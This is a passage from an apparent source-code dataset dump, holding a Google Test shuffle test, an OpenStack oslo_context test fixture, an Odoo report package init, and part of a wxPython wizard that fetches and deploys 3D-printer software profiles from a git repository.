GetTestsForAllIterations({}, [FilterFlag(TEST_FILTER)])[0])
if not SHARDED_TESTS:
SHARDED_TESTS.extend(
GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '1'},
[])[0])
if not SHUFFLED_ALL_TESTS:
SHUFFLED_ALL_TESTS.extend(GetTestsForAllIterations(
{}, [AlsoRunDisabledTestsFlag(), ShuffleFlag(), RandomSeedFlag(1)])[0])
if not SHUFFLED_ACTIVE_TESTS:
SHUFFLED_ACTIVE_TESTS.extend(GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1)])[0])
if not SHUFFLED_FILTERED_TESTS:
SHUFFLED_FILTERED_TESTS.extend(GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1), FilterFlag(TEST_FILTER)])[0])
if not SHUFFLED_SHARDED_TESTS:
SHUFFLED_SHARDED_TESTS.extend(
GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '1'},
[ShuffleFlag(), RandomSeedFlag(1)])[0])
class GTestShuffleUnitTest(gtest_test_utils.TestCase):
"""Tests test shuffling."""
def setUp(self):
CalculateTestLists()
def testShufflePreservesNumberOfTests(self):
self.assertEqual(len(ALL_TESTS), len(SHUFFLED_ALL_TESTS))
self.assertEqual(len(ACTIVE_TESTS), len(SHUFFLED_ACTIVE_TESTS))
self.assertEqual(len(FILTERED_TESTS), len(SHUFFLED_FILTERED_TESTS))
self.assertEqual(len(SHARDED_TESTS), len(SHUFFLED_SHARDED_TESTS))
def testShuffleChangesTestOrder(self):
self.assert_(SHUFFLED_ALL_TESTS != ALL_TESTS, SHUFFLED_ALL_TESTS)
self.assert_(SHUFFLED_ACTIVE_TESTS != ACTIVE_TESTS, SHUFFLED_ACTIVE_TESTS)
self.assert_(SHUFFLED_FILTERED_TESTS != FILTERED_TESTS,
SHUFFLED_FILTERED_TESTS)
self.assert_(SHUFFLED_SHARDED_TESTS != SHARDED_TESTS,
SHUFFLED_SHARDED_TESTS)
def testShuffleChangesTestCaseOrder(self):
self.assert_(GetTestCases(SHUFFLED_ALL_TESTS) != GetTestCases(ALL_TESTS),
GetTestCases(SHUFFLED_ALL_TESTS))
self.assert_(
GetTestCases(SHUFFLED_ACTIVE_TESTS) != GetTestCases(ACTIVE_TESTS),
GetTestCases(SHUFFLED_ACTIVE_TESTS))
self.assert_(
GetTestCases(SHUFFLED_FILTERED_TESTS) != GetTestCases(FILTERED_TESTS),
GetTestCases(SHUFFLED_FILTERED_TESTS))
self.assert_(
GetTestCases(SHUFFLED_SHARDED_TESTS) != GetTestCases(SHARDED_TESTS),
GetTestCases(SHUFFLED_SHARDED_TESTS))
def testShuffleDoesNotRepeatTest(self):
for test in SHUFFLED_ALL_TESTS:
self.assertEqual(1, SHUFFLED_ALL_TESTS.count(test),
'%s appears more than once' % (test,))
for test in SHUFFLED_ACTIVE_TESTS:
self.assertEqual(1, SHUFFLED_ACTIVE_TESTS.count(test),
'%s appears more than once' % (test,))
for test in SHUFFLED_FILTERED_TESTS:
self.assertEqual(1, SHUFFLED_FILTERED_TESTS.count(test),
'%s appears more than once' % (test,))
for test in SHUFFLED_SHARDED_TESTS:
self.assertEqual(1, SHUFFLED_SHARDED_TESTS.count(test),
'%s appears more than once' % (test,))
def testShuffleDoesNotCreateNewTest(self):
for test in SHUFFLED_ALL_TESTS:
self.assert_(test in ALL_TESTS, '%s is an invalid test' % (test,))
for test in SHUFFLED_ACTIVE_TESTS:
self.assert_(test in ACTIVE_TESTS, '%s is an invalid test' % (test,))
for test in SHUFFLED_FILTERED_TESTS:
self.assert_(test in FILTERED_TESTS, '%s is an invalid test' % (test,))
for test in SHUFFLED_SHARDED_TESTS:
self.assert_(test in SHARDED_TESTS, '%s is an invalid test' % (test,))
def testShuffleIncludesAllTests(self):
for test in ALL_TESTS:
self.assert_(test in SHUFFLED_ALL_TESTS, '%s is missing' % (test,))
for test in ACTIVE_TESTS:
self.assert_(test in SHUFFLED_ACTIVE_TESTS, '%s is missing' % (test,))
for test in FILTERED_TESTS:
self.assert_(test in SHUFFLED_FILTERED_TESTS, '%s is missing' % (test,))
for test in SHARDED_TESTS:
self.assert_(test in SHUFFLED_SHARDED_TESTS, '%s is missing' % (test,))
def testShuffleLeavesDeathTestsAtFront(self):
non_death_test_found = False
for test in SHUFFLED_ACTIVE_TESTS:
if 'DeathTest.' in test:
self.assert_(not non_death_test_found,
'%s appears after a non-death test' % (test,))
else:
non_death_test_found = True
def _VerifyTestCasesDoNotInterleave(self, tests):
test_cases = []
for test in tests:
[test_case, _] = test.split('.')
if test_cases and test_cases[-1] != test_case:
test_cases.append(test_case)
self.assertEqual(1, test_cases.count(test_case),
'Test case %s is not grouped together in %s' %
(test_case, tests))
def testShuffleDoesNotInterleaveTestCases(self):
self._VerifyTestCasesDoNotInterleave(SHUFFLED_ALL_TESTS)
self._VerifyTestCasesDoNotInterleave(SHUFFLED_ACTIVE_TESTS)
self._VerifyTestCasesDoNotInterleave(SHUFFLED_FILTERED_TESTS)
self._VerifyTestCasesDoNotInterleave(SHUFFLED_SHARDED_TESTS)
def testShuffleRestoresOrderAfterEachIteration(self):
# Get the test lists in all 3 iterations, using random seed 1, 2,
# and 3 respectively. Google Test picks a different seed in each
# iteration, and this test depends on the current implementation
# picking successive numbers. This dependency is not ideal, but
# makes the test much easier to write.
[tests_in_iteration1, tests_in_iteration2, tests_in_iteration3] = (
GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1), RepeatFlag(3)]))
# Make sure running the tests with random seed 1 gets the same
# order as in iteration 1 above.
[tests_with_seed1] = GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1)])
self.assertEqual(tests_in_iteration1, tests_with_seed1)
# Make sure running the tests with random seed 2 gets the same
# order as in iteration 2 above. Success means that Google Test
# correctly restores the test order before re-shuffling at the
# beginning of iteration 2.
[tests_with_seed2] = GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(2)])
self.assertEqual(tests_in_iteration2, tests_with_seed2)
# Make sure running the tests with random seed 3 gets the same
# order as in iteration 3 above. Success means that Google Test
# correctly restores the test order before re-shuffling at the
# beginning of iteration 3.
[tests_with_seed3] = GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(3)])
self.assertEqual(tests_in_iteration3, tests_with_seed3)
def testShuffleGeneratesNewOrderInEachIteration(self):
[tests_in_iteration1, tests_in_iteration2, tests_in_iteration3] = (
GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1), RepeatFlag(3)]))
self.assert_(tests_in_iteration1 != tests_in_iteration2,
tests_in_iteration1)
self.assert_(tests_in_iteration1 != tests_in_iteration3,
tests_in_iteration1)
self.assert_(tests_in_iteration2 != tests_in_iteration3,
tests_in_iteration2)
def testShuffleShardedTestsPreservesPartition(self):
# If we run M tests on N shards, the same M tests should be run in
# total, regardless of the random seeds used by the shards.
[tests1] = GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '0'},
[ShuffleFlag(), RandomSeedFlag(1)])
[tests2] = GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '1'},
[ShuffleFlag(), RandomSeedFlag(20)])
[tests3] = GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '2'},
[ShuffleFlag(), RandomSeedFlag(25)])
sorted_sharded_tests = tests1 + tests2 + tests3
sorted_sharded_tests.sort()
sorted_active_tests = []
sorted_active_tests.extend(ACTIVE_TESTS)
sorted_active_tests.sort()
self.assertEqual(sorted_active_tests, sorted_sharded_tests)
if __name__ == '__main__':
gtest_test_utils.Main()
| gpl-2.0 |
esse-io/zen-common | oslo-modules/oslo_context/fixture.py | 3 | 1505 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
from oslo_context import context
class ClearRequestContext(fixtures.Fixture):
"""Clears any cached RequestContext
This resets RequestContext at the beginning and end of tests that
use this fixture to ensure that we have a clean slate for running
tests, and that we leave a clean slate for other tests that might
run later in the same process.
"""
def setUp(self):
super(ClearRequestContext, self).setUp()
# we need to clear both when we start, and when we finish,
# because there might be other tests running that don't handle
# this correctly.
self._remove_cached_context()
self.addCleanup(self._remove_cached_context)
def _remove_cached_context(self):
"""Remove the thread-local context stored in the module."""
try:
del context._request_store.context
except AttributeError:
pass
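# A minimal usage sketch (illustrative; the test class below is an assumption,
# not part of this module). Any testtools-style test case can install the
# fixture so each test starts and ends with no cached RequestContext:
#
#     import testtools
#
#     class ExampleContextTest(testtools.TestCase):
#         def setUp(self):
#             super(ExampleContextTest, self).setUp()
#             self.useFixture(ClearRequestContext())
#             self.context = context.RequestContext()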
| apache-2.0 |
ehirt/odoo | addons/mrp/report/__init__.py | 378 | 1122 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import price
import workcenter_load
import bom_structure
import mrp_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
dob71/x2swn | x2Profiler.py | 1 | 38339 | #!/usr/bin/env python
#
# This file is part of the X2SW bundle. You can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import wx
import wx.wizard as wiz
import re
import tempfile
import shutil
from dulwich.client import get_transport_and_path
from dulwich.errors import ApplyDeltaError
from dulwich.index import Index, build_index_from_tree
from dulwich.pack import Pack, sha_to_hex
from dulwich.repo import Repo
from dulwich.server import update_server_info
from dulwich import client
VERSION_FILE = 'version.txt'
COMPAT_FILE = '.compat_ver_str.txt'
pronterface_restart = False
########################################################################
class TitledPage(wiz.WizardPageSimple):
""""""
#----------------------------------------------------------------------
def __init__(self, parent, title):
"""Constructor"""
wiz.WizardPageSimple.__init__(self, parent)
sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer = sizer
self.SetSizer(sizer)
title = wx.StaticText(self, -1, title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
sizer.Add(title, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND|wx.ALL, 5)
########################################################################
class UpdateRepoPage(wiz.PyWizardPage):
"""Startup wizard page"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sizer.Add(wx.StaticText(self, -1, "\
This wizard helps you select and deploy X2SW profiles for your printer. Each\n\
X2SW profile contains configuration files for multiple software components\n\
(Slic3r profiles, Skeinforge profiles, Pronterface rc file).\n\
\n\
The profiles from either the online or local X2SW profile repository can be\n\
deployed. When deployed the profile files override the currently active\n\
configuration files of the software included in the X2SW bundle."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.offline_mode = wx.CheckBox(self, wx.ID_ANY, 'Use local repository (off-line mode)')
self.sizer.Add(self.offline_mode)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
x2ProfilerApp.repo = None
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
except:
wx.MessageBox('Unable to delete: ' + x2ProfilerApp.tmp_repo_path, '', style = wx.OK|wx.ICON_EXCLAMATION)
pass
x2ProfilerApp.tmp_repo_path = None
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
if not self.offline_mode.GetValue():
return self.next
else:
return self.next.GetNext()
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# If no temp repo then we need to use the local one
global x2ProfilerApp
try:
if self.offline_mode.GetValue():
x2ProfilerApp.repo = Repo(x2ProfilerApp.x2swProfilesPath)
else:
x2ProfilerApp.tmp_repo_path = tempfile.mkdtemp()
x2ProfilerApp.repo = Repo.init(x2ProfilerApp.tmp_repo_path)
except:
pass
if x2ProfilerApp.repo == None:
event.Veto()
########################################################################
class DownloadingPage(wiz.PyWizardPage):
"""Wizard page for updating the profiles repo"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.status = wx.StaticText(self, -1, "Downloading from " + x2ProfilerApp.repo_url + "...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.count = 0
self.gauge = wx.Gauge(self, -1, 100, size = (250, 25))
self.sizer.Add(self.gauge)
self.gauge.SetBezelFace(3)
self.gauge.SetShadowWidth(3)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.lasttopic = None
self.msgbuf = ''
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.Show()
self.GetParent().Update()
try:
self.cmd_fetch(x2ProfilerApp.repo, x2ProfilerApp.repo_url)
self.gauge.SetValue(100)
self.status.SetLabel('Done fetching from ' + x2ProfilerApp.repo_url)
except Exception as e:
self.status.SetLabel('Failure to create temporary repository for:\n' + x2ProfilerApp.repo_url)
self.gauge.SetValue(0)
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
#----------------------------------------------------------------------
def flush(self, msg=None):
if self.lasttopic:
self.status.SetLabel(self.lasttopic)
self.gauge.SetValue(0)
self.lasttopic = None
if msg:
self.status.SetLabel(msg)
#----------------------------------------------------------------------
# as it is done in hggit (not sure why it has to be so complex...)
def progress(self, msg):
# Counting objects: 3, done.
# Compressing objects: 100% (3/3), done.
# Total 3 (delta 0), reused 0 (delta 0)
msgs = re.split('[\r\n]', self.msgbuf + msg)
self.msgbuf = msgs.pop()
for msg in msgs:
### for debugging ### print 'msg:' + msg + '\n'
td = msg.split(':', 1)
data = td.pop()
if not td:
self.flush(data)
continue
topic = td[0]
m = re.search('\((\d+)/(\d+)\)', data)
if m:
if self.lasttopic and self.lasttopic != topic:
self.flush()
self.lasttopic = topic
pos, total = map(int, m.group(1, 2))
try:
perc = int((pos * 100) / total)
except:
perc = 0
self.gauge.SetValue(perc)
else:
self.flush(msg)
self.Show()
self.GetParent().Update()
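# Illustrative: a chunk like 'Compressing objects:  47% (7/15)\r' splits into
# topic 'Compressing objects' and data '  47% (7/15)', and the gauge is set
# to int((7 * 100) / 15) == 46.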
#----------------------------------------------------------------------
def cmd_fetch(self, r, url_path):
c, path = get_transport_and_path(url_path)
c._fetch_capabilities.remove('thin-pack')
### for debugging ### c = client.SubprocessGitClient(thin_packs=False)
path = url_path
determine_wants = r.object_store.determine_wants_all
refs = c.fetch(path, r, progress=self.progress)
for k in refs.keys():
if k[-3:] == '^{}': # Annotated tag ref
k = k[:-3]
r[k] = refs[k]
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class SelectProfilesPage(wiz.PyWizardPage):
"""Wizard page for selecting what profiles to deploy"""
REF_TYPE_TAG = 1
REF_TYPE_HEAD = 2
REF_TYPE_RHEAD = 3
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.under_title_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.tree_title = wx.StaticText(self, -1, "Select the printer profile")
self.under_title_sizer.Add(self.tree_title, 1, wx.ALL|wx.ALIGN_LEFT, 0)
self.show_all = wx.CheckBox(self, wx.ID_ANY, 'Show All')
self.show_all.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.all = False
self.under_title_sizer.Add(self.show_all, 0, wx.ALL|wx.ALIGN_RIGHT, 0)
self.sizer.Add(self.under_title_sizer, 0, wx.ALL|wx.EXPAND, 5)
self.tree = wx.TreeCtrl(self, -1, style = wx.TR_HAS_BUTTONS|wx.TR_HAS_VARIABLE_ROW_HEIGHT)
image_list = wx.ImageList(16, 16)
self.profile = image_list.Add(wx.Image("images/profile.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_rb = image_list.Add(wx.Image("images/profile_rb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_lb = image_list.Add(wx.Image("images/profile_lb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.folder = image_list.Add(wx.Image("images/folder.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.tree.AssignImageList(image_list)
self.sizer.Add(self.tree, 2, wx.EXPAND)
self.sizer.Add(wx.StaticText(self, -1, "Selected profile description:"), 0, wx.ALL, 5)
self.descript = wx.TextCtrl(self, -1, '', style = wx.TE_READONLY | wx.TE_MULTILINE)
self.sizer.Add(self.descript, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.selection = None
#----------------------------------------------------------------------
def fillTree(self, refsList, path, node):
for item_name,item_file,ref_type in refsList[path]:
child_path = path + '/' + item_name
if ref_type == self.REF_TYPE_TAG:
child_ref_path = 'refs/tags' + child_path[4:]
prof_image = self.profile
elif ref_type == self.REF_TYPE_HEAD:
child_ref_path = 'refs/heads' + child_path[4:]
prof_image = self.profile_lb
elif ref_type == self.REF_TYPE_RHEAD:
child_ref_path = 'refs/remotes/origin' + child_path[4:]
prof_image = self.profile_rb
### for debugging ### print child_ref_path
child = self.tree.AppendItem(node, item_name)
if item_file:
child_ref_sha = self.refs[child_ref_path]
self.tree.SetPyData(child, child_ref_sha)
self.tree.SetItemImage(child, prof_image, wx.TreeItemIcon_Normal)
else:
self.tree.SetItemImage(child, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key(child_path):
self.fillTree(refsList, child_path, child)
#----------------------------------------------------------------------
def Run(self):
# Prepare a tree-structured dictionary of refs paths
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
refsList = {}
# Make remote origin heads look similar to tags and local heads
refkeys = ['refs/rheads'+item[19:] if item[:19]=='refs/remotes/origin' else item for item in self.refs.keys()]
reflist = sorted(sorted(refkeys),key=lambda x: -len(x.split('/')))
### for debugging #### print reflist
for ref in reflist:
parts = ref.split('/')
# We only use refs that have format refs/<tags|heads|rheads>/vX.X.X.X/<type>/...
# Filter out one-level refs and anything that is neither tag or head
if parts[0] != 'refs' or len(parts) <= 4:
continue
if parts[1] != 'tags' and parts[1] != 'heads' and parts[1] != 'rheads':
continue
# Is it a tag, a local branch head or remote branch head?
ref_type = self.REF_TYPE_TAG
if parts[1] == 'heads':
ref_type = self.REF_TYPE_HEAD
elif parts[1] == 'rheads':
ref_type = self.REF_TYPE_RHEAD
ver_prefix = parts[2]
if not self.all and not ver_prefix.startswith('v' + x2ProfilerApp.ver_match_str):
continue
parts[1] = 'root'
for ii in range(2, len(parts)):
key = '/'.join(parts[1:ii])
# see if already have the node path we are about to add
if refsList.has_key(key + '/' + parts[ii]):
continue
# build reference key
# If at the end of the branch (i.e. the tag/head ref file name)
file_ref = False
if ii >= len(parts)-1:
file_ref = True
# Still going down the ref's path...
# If we already started adding items to this subtree
if refsList.has_key(key):
refsList[key].append([parts[ii],file_ref,ref_type])
else:
refsList[key]=[[parts[ii],file_ref,ref_type]]
### for debugging ### print 'ii: '+ str(ii) +' ### key: ' + key + ' ### add: ' + parts[ii]
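# Illustrative: a single ref such as 'refs/tags/v2.1.0/FDM/MyPrinter' ends up
# in refsList as (REF_TYPE_TAG == 1, and True marks the leaf ref file):
#     {'root': [['v2.1.0', False, 1]],
#      'root/v2.1.0': [['FDM', False, 1]],
#      'root/v2.1.0/FDM': [['MyPrinter', True, 1]]}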
# Build the UI tree (can do it above, but cleaner to separate)
self.tree.DeleteAllItems()
root_str = "FDM 3D Printer Profiles for X2SW"
if self.all or len(x2ProfilerApp.ver[0]) == 0:
root_str = root_str + " (all versions)"
else:
root_str = root_str + " v" + x2ProfilerApp.ver[0]
root = self.tree.AddRoot(root_str)
self.tree.SetItemImage(root, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key('root'):
self.fillTree(refsList, 'root', root)
self.tree.Expand(root)
# On/off next button based on either a profile was selected or not
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged, self.tree)
if self.selection != None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnSelChanged(self, event):
global x2ProfilerApp
self.selection = self.tree.GetPyData(event.GetItem())
if self.selection != None:
try:
self.ShowDescription(self.selection)
x2ProfilerApp.selection = self.selection
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
except:
x2ProfilerApp.selection = None
self.descript.SetValue('')
pass
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
x2ProfilerApp.selection = None
self.descript.SetValue('')
event.Skip()
#----------------------------------------------------------------------
def ShowDescription(self, ref):
o = self.repo[ref]
if o.type_name == 'tag':
message = 'By: ' + o.tagger + '\n'
#message += 'Type: annotated tag\n'
message += o.message
elif o.type_name == 'commit':
message = 'By: ' + o.author + '\n'
#message += 'Type: tagged commit\n'
message += o.message
self.descript.SetValue(message)
#----------------------------------------------------------------------
def onCheckbox(self, event):
self.all = self.show_all.GetValue()
self.Run()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ChooseModePage(wiz.PyWizardPage):
"""Wizard page for managing in-place mode"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
This page helps to control where the X2SW profile configuration files are stored.\n\
If the \"in-place\" mode is ON all the included software stores the config files\n\
locally under \".x2sw\" in X2SW installation folder. If it is OFF the files are\n\
stored under \".x2sw\" in the user home folder.\n\
\n\
The \"in-place\" mode is configured per user account and applies to all installed\n\
copies of the X2SW bundle. The deployment path for the mode chosen is shown above.\n\
\n\
If you want to change the \"in-place\" mode setting and skip the profile deployment\n\
step, cancel the wizard after choosing the desired mode."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.inplace_mode = wx.CheckBox(self, wx.ID_ANY, 'Use In-Place mode')
self.sizer.Add(self.inplace_mode)
if os.path.exists(os.path.join(os.path.expanduser('~'), '.x2sw', '.use_local')):
self.inplace_mode.SetValue(True)
self.inplace_mode.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection == None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
global x2ProfilerApp
inplace_path = os.path.join(os.path.expanduser('~'), '.x2sw')
inplace_file = os.path.join(inplace_path, '.use_local')
if not os.path.exists(inplace_path):
os.mkdir(inplace_path)
if self.inplace_mode.IsChecked():
with file(inplace_file, 'a'):
pass
else:
os.remove(inplace_file)
x2ProfilerApp.changes = True
x2ProfilerApp.DetermineProfilesPaths()
self.UpdatePageUi()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class DeployPage(wiz.PyWizardPage):
"""Wizard page confirming what where to deploy"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
When you click \"Next\" the content of the X2SW profile selected will override\n\
the configuration files of all the X2SW software components under the \"Deployment\n\
path\". When ready confirm that you'd like to deploy and continue to the next page.\n\
\n\
WARNING: All the user files (if any) under the \"Deployment path\" will be lost!!!"), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.deploy_profile = wx.CheckBox(self, wx.ID_ANY, 'Deploy profile')
self.sizer.Add(self.deploy_profile)
self.deploy_profile.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
self.deploy_profile.SetValue(False)
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
if self.selection != None:
self.deploy_profile.Enable()
else:
self.deploy_profile.Disable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
if self.deploy_profile.IsChecked():
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# Disable buttons as we moving forward
if event.GetDirection():
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ReportResultPage(wiz.PyWizardPage):
"""Wizard page completing the deployment"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
